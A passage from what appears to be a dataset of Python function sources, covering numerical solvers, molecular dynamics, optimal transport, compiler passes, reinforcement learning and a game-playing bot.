f\"{self._loop_name}_loop_var_{i}\"\n var_type = _infer_type(lv, self._mod).checked_type\n loop_var = set_span(tvm.relay.var(var_name, type_annotation=var_type), var_name)\n self._lvar2expr[self._loop_name][loop_var] = lv\n bind_map[lv] = loop_var\n self.loop_vars[i] = loop_var\n lv = loop_var\n\n lv_list.append(lv)\n expr_list.append(self._lvar2expr[self._loop_name][lv])\n\n if bind_map:\n self.cond = rewrite_subgraph(self.cond, bind_map)\n self.body = [rewrite_subgraph(b, bind_map) for b in self.body]\n\n cond = set_span(tvm.relay.op.min(self.cond), self.cond.span)\n\n for lv, exp in self._lvar2expr[self._loop_name].items():\n if lv not in self.loop_vars:\n var_checker = VarChecker(lv)\n for bd in self.body + [cond]:\n var_checker.visit(bd)\n if var_checker.used:\n lv_list.append(lv)\n expr_list.append(exp)\n extra_vars.append(lv)\n break\n\n with sb.if_scope(cond):\n sb.ret(wl(*list(self.body + extra_vars)))\n with sb.else_scope():\n sb.ret(tvm.relay.Tuple(lv_list))\n\n loop_fn = tvm.relay.Function(lv_list, sb.get())\n sb = tvm.relay.scope_builder.ScopeBuilder()\n sb.let(wl, loop_fn)\n loop_ret = wl(*expr_list)\n\n sb.ret(loop_ret)\n ret = sb.get()\n return ret", "def preCondConjugateGradientSolver(b, x, linsys_setup, eps, i_max, plotInterval, mapDir):\n datamaps, ninvs, beams, freqs, power_2d, precond_2d, clumaps, g_nu, \\\n map_prop = linsys_setup\n nx, ny, pixScaleX, pixScaleY = map_prop\n nCluster = len(clumaps[0])\n ksz = False\n if len(clumaps)==2: ksz=True\n \n \n # Calculate residual r = b - (A^-1) x\n r = b - applyMat(x, linsys_setup)\n d = r\n\n\n delta_new = numpy.inner(r,r)\n \n\n\n\n delta_o = delta_new\n delta_array = numpy.zeros(shape=(i_max))\n \n # Iterate CG solver until converged\n i = 0\n #i_max = 300\n while (i < i_max) and (delta_new > delta_o*eps**2.):\n if i==0: t = time.time()\n \n if i%plotInterval == 0 and i != 0:\n print \"\\tNumber of iterations in the CG:\", i\n x0 = x[:nx*ny] # CMB\n x1 = x[nx*ny:nx*ny+1] # Monopole\n x2 = x[nx*ny+1:nx*ny+1+nCluster] # TSZ\n if ksz: x3 = x[nx*ny+1+nCluster:nx*ny+1+2*nCluster]\n print \"\\tMonopole:\", x1\n print \"\\tTSZ:\", x2\n if ksz: print \"\\tKSZ:\", x3\n \n x0.shape = (ny,nx)\n a_l = numpy.fft.fft2(x0)\n a_l *= precond_2d\n x_test = numpy.real(numpy.fft.ifft2(a_l))\n plot(x_test,mapDir+'/CMB_%d.png'%i,'Reconstructed CMB', range=(-250., 250.))\n print delta_new, delta_o*eps**2.\n\n q = applyMat(d, linsys_setup)\n alpha = delta_new / (numpy.inner(d,q))\n x += alpha * d\n\n # What does this do? It's always false.\n if i/50. 
< numpy.int(i/50):\n r = b - applyMat(x, linsys_setup)\n else:\n r = r - alpha*q\n \n delta_old = delta_new\n delta_new = numpy.inner(r,r)\n beta = delta_new/delta_old\n d = r + beta * d\n #if i==0: print \"\\tEach iteration takes:\", time.time()-t\n i += 1\n\n x0 = x[:nx*ny].reshape((ny, nx))\n x1 = x[nx*ny:nx*ny+1]\n x2 = x[nx*ny+1:nx*ny+1+nCluster]\n if ksz:\n x3 = x[nx*ny+1+nCluster:nx*ny+1+2*nCluster]\n else:\n x3 = None\n \n a_l = numpy.fft.fft2(x0) * precond_2d\n x0 = numpy.real(numpy.fft.ifft2(a_l))\n\n \n # CMB, monopole, TSZ, KSZ\n return x0, x1, x2, x3", "def force ( box, strain, r ):\n\n import numpy as np\n from itertools import product\n import math\n \n # It is assumed that positions are in units where box = 1\n # Forces are calculated in units where sigma = 1 and epsilon = 1\n # Lees-Edwards boundaries, in sliding brick arrangement\n # Flow/gradient/vorticity directions are x/y/z == 0/1/2\n # Uses neighbour lists\n\n n = r.shape[0]\n\n # Set up vectors to half the cells in neighbourhood of 3x3x3 cells in cubic lattice\n # The cells are chosen so that if (d0,d1,d2) appears, then (-d0,-d1,-d2) does not.\n # The last three cells are extra ones, to cope with the sheared system\n d = np.array ( [ [ 0, 0, 0], [ 1, 0, 0], [ 1, 0, 1], [-1, 0, 1], [ 0, 0, 1], # 5 cells with d1=0\n [ 1, 1, -1], [ 1, 1, 0], [ 1, 1, 1], # 3 cells with d0= 1, d1=1\n [ 0, 1, -1], [ 0, 1, 0], [ 0, 1, 1], # 3 cells with d0= 0, d1=1\n [-1, 1, -1], [-1, 1, 0], [-1, 1, 1], # 3 cells with d0=-1, d1=1\n [-2, 1, -1], [-2, 1, 0], [-2, 1, 1] ] ) # 3 cells with d0=-2, d1=1\n\n r[:,0] = r[:,0] - np.rint(r[:,1])*strain # Extra correction in box=1 units\n r = r - np.rint(r) # Ensure all atoms in periodic box\n \n sr2_ovr = 1.77 # Overlap threshold (pot > 100)\n r_cut_box = r_cut / box\n r_cut_box_sq = r_cut_box ** 2\n box_sq = box ** 2\n\n # Initialize\n f = np.zeros_like(r)\n total = PotentialType ( pot=0.0, vir=0.0, pyx=0.0, lap=0.0, ovr=False )\n\n # Calculate cell index triplets\n sc = math.floor(box/r_cut) # Number of cells along box edge\n assert sc >= 3, 'System is too small for cells' # Guard against box being too small\n c = np.floor((r+0.5)*sc).astype(np.int_) # N*3 array of cell indices for all atoms\n assert np.all(c>=0) and np.all(c<sc), 'Index error' # Simplistic \"guard\" against roundoff\n\n shift = math.floor(strain*sc) # Strain measured in cell lengths\n\n if fast:\n \n # Build list of arrays, each array holding positions of atoms in a cell\n # At the same time, define a matching set of force arrays in each cell\n # i and j number the atoms in each cell; we do not refer explicitly to indices in r\n rc, fc = [], [] # Initially empty lists of positions and forces\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n rc.append(r[mask,:]) # Copy atom coordinates into array, add to list\n fc.append(np.zeros_like(rc[-1])) # Zero corresponding forces, add to list\n\n for ci1, rci in enumerate(rc): # Loop over i-cells, getting all atoms in each i-cell as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n if rci.size==0: # Handle empty cell\n continue\n\n # Set up correct neighbour cell indices\n if ci[1]==sc-1: # i-cell is in the top layer\n dd = d.copy() # Standard list copied, including extra 3 cells\n dd[5:,0] = d[5:,0] - shift # All those looking up need adjustment in the x direction\n else: # i-cell is not in top layer\n dd = d[:-3,:].copy() # Last three extra cells are not needed; shift is not 
needed\n \n for dj in dd: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert j-cell to single-index\n rcj = rc[cj1] # Get atoms in j-cell as an array\n if rcj.size==0: # Handle empty cell\n continue\n\n rij = rci[:,np.newaxis,:]-rcj[np.newaxis,:,:] # Separation vectors for all i and j\n rij[:,:,0] = rij[:,:,0] - np.rint(rij[:,:,1])*strain # Extra correction in box=1 units\n rij = rij - np.rint(rij) # PBCs in box=1 units\n rij_sq = np.sum(rij**2,axis=2) # Squared separations\n in_range = rij_sq < r_cut_box_sq # Set flags for within cutoff\n\n if ci1==cj1:\n np.fill_diagonal(in_range,False) # Eliminate i==j when i-cell==j-cell\n np.fill_diagonal(rij_sq,1.0) # Avoid divide-by-zero below\n\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = np.where ( in_range, 1.0/rij_sq, 0.0 ) # (sigma/rij)**2, only if in range\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 2\n pot = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = pot + sr12 # LJ virial\n pot = np.where ( in_range, pot+0.25, 0.0 ) # WCA LJ pair potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = vir * sr2 # LJ scalar part of forces\n fij = rij * fij[:,:,np.newaxis] # LJ pair forces\n pyx = rij[:,:,1]*fij[:,:,0] # Off-diagonal element of pressure tensor\n\n if ci1==cj1: # Correct for double-counting ij and ji when i-cell==j-cell\n fij = fij / 2\n total = total + PotentialType ( pot=np.sum(pot)/2, vir=np.sum(vir)/2, \n pyx=np.sum(pyx)/2, lap=np.sum(lap)/2, ovr=np.any(ovr) )\n else:\n total = total + PotentialType ( pot=np.sum(pot), vir=np.sum(vir), \n pyx=np.sum(pyx), lap=np.sum(lap), ovr=np.any(ovr) )\n\n fc[ci1][:,:] = fc[ci1][:,:] + np.sum(fij,axis=1) # Aggregate force on atoms in i-cell\n fc[cj1][:,:] = fc[cj1][:,:] - np.sum(fij,axis=0) # Aggregate force on atoms in j-cell\n\n # Copy forces from list of cell arrays to main force array\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n ci1 = np.ravel_multi_index(ci,(sc,sc,sc),mode='wrap') # Single-index\n f[mask,:] = fc[ci1] # Copy atom forces from correct cell\n\n else:\n \n # Build list of arrays, each array holding indices of atoms in a cell\n # ki and kj are atom indices in the r array; i and j number the atoms in each cell\n k_array = np.arange(n) # Atom indices 0..N-1\n kc = [] # Initially empty list of indices\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n kc.append(k_array[mask]) # Copy atom indices into array, add to list\n\n for ci1, kci in enumerate(kc): # Loop over i-cells, getting atom indices as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n\n # Set up correct neighbour cell indices\n if ci[1]==sc-1: # i-cell is in the top layer\n dd = d # Standard list copied, including extra 3 cells\n dd[5:,0] = dd[5:,0] - shift # All those looking up need adjustment in the x direction\n else:\n dd = d[:-3,:] # Last three extra cells are not needed; shift is not needed\n\n for dj in dd: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert to single-index\n kcj = kc[cj1] # Get indices of atoms in j-cell as an array\n\n for i, ki in enumerate(kci): # Loop over 
individual atoms in i-cell\n j0 = i+1 if cj1==ci1 else 0 # Only look upwards if i-cell==j-cell\n if j0 >= kcj.size: # Handles (redundantly) empty j-cell and the case \n continue # where j-cell==i-cell and i is last atom\n\n for kj in kcj[j0:]: # Loop over individual atoms in j-cell\n rij = r[ki,:]-r[kj,:] # Separation vector\n rij[0] = rij[0] - np.rint(rij[1])*strain # Extra correction in box=1 units\n rij = rij - np.rint(rij) # Periodic boundary conditions in box=1 units\n rij_sq = np.sum(rij**2) # Squared separation\n\n if rij_sq < r_cut_box_sq: # Check within cutoff\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = 1.0 / rij_sq # (sigma/rij)**2\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 2\n pot = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = pot + sr12 # LJ virial\n pot = pot + 0.25 # WCA LJ potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = rij * vir * sr2 # LJ forces\n pyx = rij[1]*fij[0] # Off-diagonal element of pressure tensor\n total = total + PotentialType ( pot=pot, vir=vir, pyx=pyx, lap=lap, ovr=ovr )\n f[ki,:] = f[ki,:] + fij\n f[kj,:] = f[kj,:] - fij\n\n # Multiply results by numerical factors\n f = f * 24.0 # 24*epsilon\n total.pot = total.pot * 4.0 # 4*epsilon\n total.vir = total.vir * 24.0 / 3.0 # 24*epsilon and divide virial by 3\n total.pyx = total.pyx * 24.0 # 24*epsilon\n total.lap = total.lap * 24.0 * 2.0 # 24*epsilon and factor 2 for ij and ji\n \n return total, f", "def run_model(f_grid, h_grid, i_threshold, w_direction, burn_seeds):\n \n burnt_cells = burn_seeds\n \n # a list of all the cells to iterate over\n cell_list = []\n for i in range(len(f_grid)):\n for j in range(len(f_grid)):\n cell = (i, j)\n cell_list.append(cell)\n \n # create a mutable burning grid to be refered to in check_ignition function\n b_grid = []\n for i in range(len(f_grid)):\n b_grid.append([])\n for j in range(len(f_grid)):\n b_grid[i].append(False)\n for cell in cell_list:\n if cell in burn_seeds:\n b_grid[cell[0]][cell[1]] = True\n \n \n while test_bool(b_grid) is True:\n \n # lists for how the cells are currently behaving so that next_t and \n # check ignition can iterate through the same values for every cell in \n # each time frame\n current_fuel = copy_list(f_grid)\n current_burning = copy_list(b_grid)\n \n # generate scenario in the next time frame\n next_t(cell_list, current_burning, b_grid, current_fuel, f_grid, \n h_grid, i_threshold, w_direction, burnt_cells)\n \n return f_grid, len(burnt_cells)", "def non_interacting_conductivity(self,\n sigma=0.04,\n freq_range=(0.0, 6.0, 1000),\n imag_dielectric=False,\n broadening='lorentz'):\n cell_area = np.abs(float(np.cross(self.a1, self.a2)))*len(self.k_grid)\n broad_fnc = get_broadening_function(broadening, sigma)\n\n frequency_grid = np.linspace(*freq_range)\n energy_increment = np.abs(frequency_grid[1] - frequency_grid[0])\n num_freqs, min_freq = len(frequency_grid), min(frequency_grid)\n output_grid = np.zeros(num_freqs)\n\n energy_power = 1 + int(imag_dielectric)\n prefactor = e_charge_2_over_epsilon0 if imag_dielectric else 1\n prefactor = prefactor/cell_area\n\n # Assuming x polarisation for now\n position_dipole_matrix = self.construct_position_dipole_matrix()\n\n n_shift = self.n_spins*self.n_orbs\n for idx1, kpt in enumerate(self.k_grid):\n for s0 in range(self.n_spins):\n velocity_matrix = self.load_velocity_matrix(idx1)\n bands = self.exciton_obj.get_number_conduction_valence_bands(\n idx1, s0\n 
)\n v_num, c_num = bands\n eigvals = np.array(\n self.file_storage['eigensystem']['eigenvalues'][idx1]\n )\n\n j1 = n_shift*idx1 + (self.n_spins - 1)*s0*self.n_orbs\n j2 = j1 + self.n_orbs\n eigvecs = np.array(\n self.file_storage['eigensystem']['eigenvectors'][j1:j2, :]\n )\n for v, c in product(range(v_num), range(c_num)):\n cb_vector = eigvecs[:, v_num + c]\n vb_vector = eigvecs[:, v]\n cb_energy, vb_energy = eigvals[v_num + c], eigvals[v]\n energy_diff = (cb_energy - vb_energy)\n\n energy_diff_pow = energy_diff**energy_power\n matrix_elem = velocity_matrix_element(vb_vector,\n cb_vector,\n velocity_matrix)\n if self.use_dipole_term:\n position_dipole_term = get_position_dipole_element(\n vb_vector,\n cb_vector,\n vb_energy,\n cb_energy,\n position_dipole_matrix\n )\n matrix_elem = matrix_elem + position_dipole_term\n\n main_term = np.abs(matrix_elem)**2/energy_diff_pow\n closest_idx = (energy_diff - min_freq)//energy_increment\n idx_reach = self.reach_multiplier*(sigma//energy_increment)\n\n lower_idx = max([closest_idx - idx_reach, 0])\n upper_idx = min([closest_idx + idx_reach, num_freqs - 1])\n\n for idx2 in range(int(lower_idx), int(upper_idx)):\n smearing = broad_fnc(energy_diff, frequency_grid[idx2])\n output = prefactor*main_term*smearing\n output_grid[idx2] += output\n\n return frequency_grid, output_grid", "def mbieLoop (self) :\n self.iterCnt = 0\n while self.iterCnt < 5000:\n s = self.mdp.s0\n for h in range(self.H) :\n self.QUpper = QBoundsSolver(self.mdp, self.PHat, self.QUpper, self.Ntotal, 0.1, True, self.stop)\n a = np.argmax(self.QUpper[s])\n s_, self.R[s,a] = self.mdp.step(s, a)\n self.updateVisitStatistics(s, a, s_)\n s = s_\n\n if self.iterCnt % 10 == 0: \n print(self.iterCnt)\n print(self.QUpper)\n\n self.iterCnt += 1", "def set_bc(self, problem):\n bcs = problem.bcs\n n_bound = cfg.const['N_GHOST_CELLS']\n # Left X-b.c.\n for i in range(0, self.i_min):\n for j in range(self.j_min, self.j_max):\n for k in range(self.k_min, self.k_max): \n if bcs[0] == 't': \n self.U[i][j][k] = self.U[self.i_min][j][k]\n elif bcs[0] == 'w':\n for num in [0, 2, 3, 4]: # 0 -> 3, 1 -> 2, i_min-1 -> i_min, i_min-2 -> i_min+1\n self.U[i][j][k][num] = self.U[self.i_min + (self.i_min - i - 1)][j][k][num]\n for num in [1]:\n self.U[i][j][k][num] = - self.U[self.i_min + (self.i_min - i - 1)][j][k][num]\n else:\n print(\"Errof field.set_ics(): only wall-type and transmissive boundaries supported! Bye!\")\n # Right X-b.c.\n for i in range(self.i_max, self.i_max+n_bound):\n for j in range(self.j_min, self.j_max):\n for k in range(self.k_min, self.k_max): \n if bcs[1] == 't':\n self.U[i][j][k] = self.U[self.i_max-1][j][k]\n elif bcs[1] == 'w':\n for num in [0, 2, 3, 4]: # i_max -> i_max-1 , i_max+1-> i_max-2\n self.U[i][j][k][num] = self.U[self.i_max - (i - self.i_max + 1)][j][k][num]\n for num in [1]:\n self.U[i][j][k][num] = - self.U[self.i_max - (i - self.i_max + 1)][j][k][num]\n else:\n print(\"Error field.set_ics(): only wall-type and transmissive boundaries supported! Bye!\")\n # Left Y-b.c.\n for i in range(0, self.i_max+n_bound):\n for j in range(0, self.j_min):\n for k in range(self.k_min, self.k_max): \n if bcs[2] == 't':\n self.U[i][j][k] = self.U[i][self.j_min][k]\n elif bcs[2] == 'w':\n for num in [0, 1, 3, 4]:\n self.U[i][j][k][num] = self.U[i][self.j_min + (self.j_min - j - 1)][k][num]\n for num in [2]:\n self.U[i][j][k][num] = - self.U[i][self.j_min + (self.j_min - j - 1)][k][num]\n else:\n print(\"Error field.set_ics(): only wall-type and transmissive boundaries supported! 
Bye!\")\n # Right Y-b.c.\n for i in range(0, self.i_max+n_bound):\n for j in range(self.j_max, self.j_max+n_bound):\n for k in range(self.k_min, self.k_max): \n if bcs[3] == 't':\n self.U[i][j][k] = self.U[i][self.j_max-1][k]\n elif bcs[3] == 'w':\n for num in [0, 1, 3, 4]:\n self.U[i][j][k][num] = self.U[i][self.j_max - (j - self.j_max + 1)][k][num]\n for num in [2]:\n self.U[i][j][k][num] = -self.U[i][self.j_max - (j - self.j_max + 1)][k][num]\n else:\n print(\"Error field.set_ics(): only wall-type and transmissive boundaries supported! Bye!\")\n # Left Z-b.c.\n for i in range(0, self.i_max+n_bound):\n for j in range(0, self.j_max+n_bound):\n for k in range(0, self.k_min): \n if bcs[4] == 't':\n self.U[i][j][k] = self.U[i][j][self.k_min]\n elif bcs[4] == 'w':\n for num in [0, 1, 2, 4]:\n self.U[i][j][k][num] = self.U[i][j][self.k_min + (self.k_min - k - 1)][num]\n for num in [3]:\n self.U[i][j][k][num] = - self.U[i][j][self.k_min + (self.k_min - k - 1)][num]\n else:\n print(\"Error field.set_ics(): only wall-type and transmissive boundaries supported! Bye!\")\n # Right Z-b.c.\n for i in range(0, self.i_max+n_bound):\n for j in range(0, self.j_max+n_bound):\n for k in range(self.k_max, self.k_max+n_bound):\n if bcs[5] == 't':\n self.U[i][j][k] = self.U[i][j][self.k_max-1]\n elif bcs[5] == 'w':\n for num in [0, 1, 2, 4]:\n self.U[i][j][k][num] = self.U[i][j][self.k_max - (k - self.k_max + 1)][num]\n for num in [3]:\n self.U[i][j][k][num] = - self.U[i][j][self.k_max - (k - self.k_max + 1)][num]\n else:\n print(\"Error field.set_ics(): only wall-type and transmissive boundaries supported! Bye!\")", "def inner_loop(b_i, b_ij, phi_ij, psi_i, lambda_ij, gamma_ij, N):\n # Compute energy\n dual_E = compute_dual_energy(b_i, phi_ij, psi_i, lambda_ij, gamma_ij, N)\n conv_crit = numpy.inf\n\n while conv_crit > 1e-10:\n # Until not converged update lagrange multipliers\n lambda_ij = update_lambda(b_i, phi_ij, psi_i, lambda_ij, gamma_ij, N)\n gamma_ij = update_gamma(phi_ij, lambda_ij, N)\n # Compute dual energy\n dual_E_old = dual_E\n dual_E = compute_dual_energy(b_i, phi_ij, psi_i, lambda_ij, gamma_ij, N)\n conv_crit = (dual_E_old - dual_E) / dual_E_old\n\n # Return\n return lambda_ij, gamma_ij", "def bypass_conds(self):\n for block in self.get_basic_blocks_followed_by_branches():\n constants = collect_constant_assigns(block.statements)\n branch = block.outgoing_edge[0]\n cond = deepcopy(branch.cond)\n cond = specialize_constants(cond, constants)\n try:\n if eval(astor.to_source(cond), silica.operators):\n # FIXME: Interface violation, need a remove method from blocks\n branch.true_edge.incoming_edges.add((block, \"\"))\n block.outgoing_edges = {(branch.true_edge, \"\")}\n else:\n branch.false_edge.incoming_edges.add((block, \"\"))\n block.outgoing_edges = {(branch.false_edge, \"\")}\n branch.incoming_edges.remove((block, \"\"))\n except NameError as e:\n # print(e)\n pass", "def regularize_bwd(X, y, mu0, mu1, v1, nz, K, verbose=False):\n \n if verbose: sss=0#print '\\ncompute bath between mu=%.4f and mu=%.4f'%(mu0, mu1)\n \n n, m = X.shape\n X_nz = np.atleast_2d(X[:, nz])\n b = np.dot(X.T, y)\n G = np.dot(X.T, X)\n \n nbr = 0\n mu = mu0\n trans_type = -1\n trans_sign = 0\n trans_ind = -1\n if verbose: nbr=0#print 'initial active features =', nz\n \n while mu > mu1:\n \n # find the breakpoints where coefficients become zero\n b_nz = b[nz]\n Kv1 = np.dot(K, v1)\n Kb_nz = np.dot(K, b_nz)\n mu_0 = Kb_nz / Kv1\n \n # find the breakpoints where new coefficients become active\n z = 
np.setdiff1d(np.arange(m), nz)\n X_z = np.atleast_2d(X[:, z])\n b_z = b[z]\n M = G[np.ix_(z, nz)]\n MKb_nz = np.dot(M, Kb_nz)\n MKv1 = np.dot(M, Kv1)\n mu_1 = (b_z - MKb_nz) / (1 - MKv1)\n mu_m1 = (b_z - MKb_nz) / (-1 - MKv1)\n \n if trans_type > 0: mu_0[-1] = mu1\n mu_0[mu_0 >= mu] = mu1\n if len(mu_0) > 0: \n mu_0_argmax = mu_0.argmax()\n mu_0_max = mu_0[mu_0_argmax][0]\n else:\n mu_0_max = mu1\n if trans_type == 0:\n if trans_sign == 1: mu_1[np.where(z == trans_ind)[0]] = mu1 - 1\n else: mu_m1[np.where(z == trans_ind)[0]] = mu1 - 1\n mu_1[mu_1 >= mu] = mu1\n if len(mu_1) > 0: \n mu_1_argmax = mu_1.argmax()\n mu_1_max = mu_1[mu_1_argmax][0]\n else:\n mu_1_max = mu1\n mu_m1[mu_m1 >= mu] = mu1\n if len(mu_m1) > 0: \n mu_m1_argmax = mu_m1.argmax()\n mu_m1_max = mu_m1[mu_m1_argmax][0]\n else:\n mu_m1_max = mu1\n \n # compute the breakpoint\n mu_br_all = np.array([mu_0_max, mu_1_max, mu_m1_max])\n trans_type = mu_br_all.argmax()\n mu_br = mu_br_all[trans_type]\n \n if mu_br > mu1:\n \n nbr += 1\n mu = mu_br\n \n if trans_type == 0: # an element of theta(t) goes to zero\n trans_ind = nz[mu_0_argmax]\n trans_sign = v1[mu_0_argmax]\n if verbose: sss=0#print 'transition point :: mu = %.4f :: feature %d is inactive'%(mu, trans_ind)\n nzind = range(len(nz))\n rr=np.where(nz==trans_ind)[0][0]\n #print 'longa:',len(nz),len(nzind),len(v1)\n #print 'c:',nz.index(trans_ind)\n nzind=np.delete(nzind,rr)#nzind=np.delete(nzind,np.where(nzind==nz.index(trans_ind)))#nzind.remove(nz.index(trans_ind))\n v1 = v1[nzind]\n nz=np.delete(nz,rr)#nz=np.delete(nz,np.where(nz==trans_ind))#nz.remove(trans_ind)\n #print 'longa2:',len(nz),len(nzind),len(v1)\n X_nz = X[:, nz]\n K = invupdatered(K, mu_0_argmax)\n else: # new active element\n if trans_type == 1: # it is positive\n trans_ind = z[mu_1_argmax]\n if verbose: sss=0#print 'transition point :: mu = %.4f :: feature %d is positive'%(mu, trans_ind)\n nz=np.append(nz,trans_ind)#nz.append(trans_ind)\n v1 = np.vstack([v1, 1])\n else: # it is negative\n trans_ind = z[mu_m1_argmax]\n if verbose: sss=0#print 'transition point :: mu = %.4f :: feature %d is negative'%(mu, trans_ind)\n nz=np.append(nz,trans_ind)#nz.append(trans_ind)\n v1 = np.vstack([v1, -1])\n X_new = np.atleast_2d(X[:, trans_ind]).T\n K = invupdateapp(K, np.dot(X_nz.T, X_new), np.dot(X_new.T, X_nz), \n np.dot(X_new.T, X_new))\n X_nz = X[:, nz]\n \n else: # compute solution at mu1\n \n if verbose: sss=0#print 'compute solution at mu =', mu1\n theta_nz = Kb_nz - mu1*Kv1\n mu = mu1\n \n return theta_nz, nz, K, nbr", "def _sinkhorn_iterations(\n tau_a: float,\n tau_b: float,\n inner_iterations: int,\n min_iterations: int,\n max_iterations: int,\n momentum_default: float,\n chg_momentum_from: int,\n lse_mode: bool,\n implicit_differentiation: bool,\n threshold: float,\n norm_error: Sequence[int],\n geom: geometry.Geometry,\n a: jnp.ndarray,\n b: jnp.ndarray) -> Tuple[jnp.ndarray, jnp.ndarray, jnp.ndarray]:\n\n # Defining the Sinkhorn loop, by setting initializations, body/cond.\n num_a, num_b = geom.shape\n if lse_mode:\n f_u, g_v = jnp.zeros_like(a), jnp.zeros_like(b)\n else:\n f_u, g_v = jnp.ones_like(a) / num_a, jnp.ones_like(b) / num_b\n\n errors = -jnp.ones((np.ceil(max_iterations / inner_iterations).astype(int),\n len(norm_error)))\n const = (geom, a, b, threshold)\n\n def cond_fn(iteration, const, state):\n threshold = const[-1]\n errors = state[0]\n err = errors[iteration // inner_iterations-1, 0]\n\n return jnp.logical_or(iteration == 0,\n jnp.logical_and(jnp.isfinite(err), err > threshold))\n\n def 
get_momentum(errors, idx):\n \"\"\"momentum formula, https://arxiv.org/pdf/2012.12562v1.pdf, p.7 and (5).\"\"\"\n error_ratio = jnp.minimum(errors[idx - 1, -1] / errors[idx - 2, -1], .99)\n power = 1.0 / inner_iterations\n return 2.0 / (1.0 + jnp.sqrt(1.0 - error_ratio ** power))\n\n def body_fn(iteration, const, state, compute_error):\n \"\"\"Carries out sinkhorn iteration.\n\n Depending on lse_mode, these iterations can be either in:\n - log-space for numerical stability.\n - scaling space, using standard kernel-vector multiply operations.\n\n Args:\n iteration: iteration number\n const: tuple of constant parameters that do not change throughout the\n loop, here the geometry and the marginals a, b.\n state: potential/scaling variables updated in the loop & error log.\n compute_error: flag to indicate this iteration computes/stores an error\n\n Returns:\n state variables, i.e. errors and updated f_u, g_v potentials.\n \"\"\"\n geom, a, b, _ = const\n errors, f_u, g_v = state\n\n # compute momentum term if needed, using previously seen errors.\n w = jax.lax.stop_gradient(jnp.where(iteration >= (\n inner_iterations * chg_momentum_from + min_iterations),\n get_momentum(errors, chg_momentum_from),\n momentum_default))\n\n # sinkhorn updates using momentum, in either scaling or potential form.\n if lse_mode:\n new_g_v = tau_b * geom.update_potential(f_u, g_v, jnp.log(b),\n iteration, axis=0)\n g_v = (1.0 - w) * jnp.where(jnp.isfinite(g_v), g_v, 0.0) + w * new_g_v\n\n new_f_u = tau_a * geom.update_potential(f_u, g_v, jnp.log(a),\n iteration, axis=1)\n f_u = (1.0 - w) * jnp.where(jnp.isfinite(f_u), f_u, 0.0) + w * new_f_u\n else:\n new_g_v = geom.update_scaling(f_u, b, iteration, axis=0) ** tau_b\n g_v = jnp.where(g_v > 0, g_v, 1) ** (1.0 - w) * new_g_v ** w\n\n new_f_u = geom.update_scaling(g_v, a, iteration, axis=1) ** tau_a\n f_u = jnp.where(f_u > 0, f_u, 1) ** (1.0 - w) * new_f_u ** w\n\n # re-computes error if compute_error is True, else set it to inf.\n err = jnp.where(\n jnp.logical_and(compute_error, iteration >= min_iterations),\n marginal_error(geom, a, b, tau_a, tau_b, f_u, g_v, norm_error,\n lse_mode),\n jnp.inf)\n\n errors = jax.ops.index_update(\n errors, jax.ops.index[iteration // inner_iterations, :], err)\n return errors, f_u, g_v\n\n # Run the Sinkhorn loop. choose either a standard fixpoint_iter loop if\n # differentiation is implicit, otherwise switch to the backprop friendly\n # version of that loop if using backprop to differentiate.\n\n if implicit_differentiation:\n fix_point = fixed_point_loop.fixpoint_iter\n else:\n fix_point = fixed_point_loop.fixpoint_iter_backprop\n\n errors, f_u, g_v = fix_point(\n cond_fn, body_fn, min_iterations, max_iterations, inner_iterations, const,\n (errors, f_u, g_v))\n\n f = f_u if lse_mode else geom.potential_from_scaling(f_u)\n g = g_v if lse_mode else geom.potential_from_scaling(g_v)\n\n return f, g, errors[:, 0]", "def ml_loop(side: str):\n\n # === Here is the execution order of the loop === #\n # 1. 
Put the initialization code here\n ball_served = False\n blocker_last_x = 0\n\n class Pred:\n pred = 100\n blocker_pred_x = 0\n last_command = 0\n blocker_vx = 0\n\n \n def move_to(player, pred) : #move platform to predicted position to catch ball \n if player == '1P':\n if scene_info[\"platform_1P\"][0]+20 > (pred-10) and scene_info[\"platform_1P\"][0]+20 < (pred+10): return 0 # NONE\n elif scene_info[\"platform_1P\"][0]+20 <= (pred-10) : return 1 # goes right\n else : return 2 # goes left\n else :\n if scene_info[\"platform_2P\"][0]+20 > (pred-10) and scene_info[\"platform_2P\"][0]+20 < (pred+10): return 0 # NONE\n elif scene_info[\"platform_2P\"][0]+20 <= (pred-10) : return 1 # goes right\n else : return 2 # goes left\n\n def ml_loop_for_1P(): \n # ball slicing\n if scene_info[\"ball_speed\"][1] > 0 and (scene_info[\"ball\"][1]+scene_info[\"ball_speed\"][1]) >= 415 and Pred.last_command == 0:\n print(\"------\")\n ball_x = scene_info[\"ball\"][0]\n ball_y = scene_info[\"ball\"][1]\n ball_vx = scene_info[\"ball_speed\"][0]\n ball_slice_vx = scene_info[\"ball_speed\"][0]+np.sign(scene_info[\"ball_speed\"][0])*3\n ball_vy = scene_info[\"ball_speed\"][1] \n blocker_x = scene_info['blocker'][0] + Pred.blocker_vx\n \n y = abs((415 - ball_y) // ball_vy)\n pred_ball_1P = ball_x + ball_vx * y\n\n y = abs((415 - 260) // ball_vy)\n pred_ball_blocker = pred_ball_1P + ball_slice_vx * y\n bound = 